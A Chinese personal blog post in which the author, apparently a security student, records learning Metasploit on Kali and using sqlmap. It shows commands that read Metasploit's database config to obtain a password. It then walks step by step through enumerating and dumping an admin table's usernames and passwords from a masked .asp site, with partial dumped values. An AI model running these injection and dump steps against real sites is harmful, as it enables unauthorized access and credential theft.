現在已經在看那本metasploit滲透測試指南了,雖然書是12年的,但還是有很多知識,當然很多疑惑,畢竟我在用的是kali。。。版本有很大改變。。好多不準!,還有就是連接數據庫的問題,看了網上答案,應該先看看database.yml這個文件(我猜的,大神求教)
cat /opt/metasploit/config/database.yml
已顯示密碼了。
接着看看它用那個端口:
netstat -tnpl | grep postgres
而後:
db_connect msf3:4bfedc2@localhost:端口/msf3
在看看狀態
db_status
ok 已連接
呵呵~~~~~
後來又跟着大神xiao136xx(網易博客)傳送門大神的大神,學了點sqlmap,的確長知識了不少,如下:
sqlmap --url http://www.xxxx.asp?id=xx --dbs
--url 目標url。
--dbs 枚舉數據庫。
然後枚舉表。
表名已出來。
然後枚舉數據庫表列:
看username,password已出來,所以現在正式開始猜解:
--dump轉儲,也就是下載的意思吧。
爲什麼
<span style="background-color: rgb(255, 102, 102);">resumed:dba902f69c09ceb8
resumed:jx_lc_ztxx
</span>
呢?
因爲我之前測試過了-。-!
<pre class="html" name="code">sqlmap --url http://www.xxxx.asp?id=xx -D 數據庫 -T admin -C ”password,username“ --dump
OK了
上面就是登錄名和密碼了,別問我解密不出來,我特麼也沒辦法。。。呵呵。
</pre><pre class="html" name="code">好吧,還有爲什麼背景圖不一樣呢,那是因爲前一個在backtrack5下面測試,另一個在kali啦。。。。
我好無聊額(我知道沒人看的zzz)。
好累,最近一直在測試學習metasploit,但我好厭惡我總是沒什麼進步,一天都呆在實驗室,一天都在測試,沒什麼效果啊,我要崩潰了。
旁邊小夥伴問我,你最孤獨的時候是什麼?
呵呵,我早已習慣了。。。。。。。。。。。--! :)
雄關漫道真如鐵,萬水千山不等閒啊!
不說了,我去泡杯奶茶壓壓驚。:)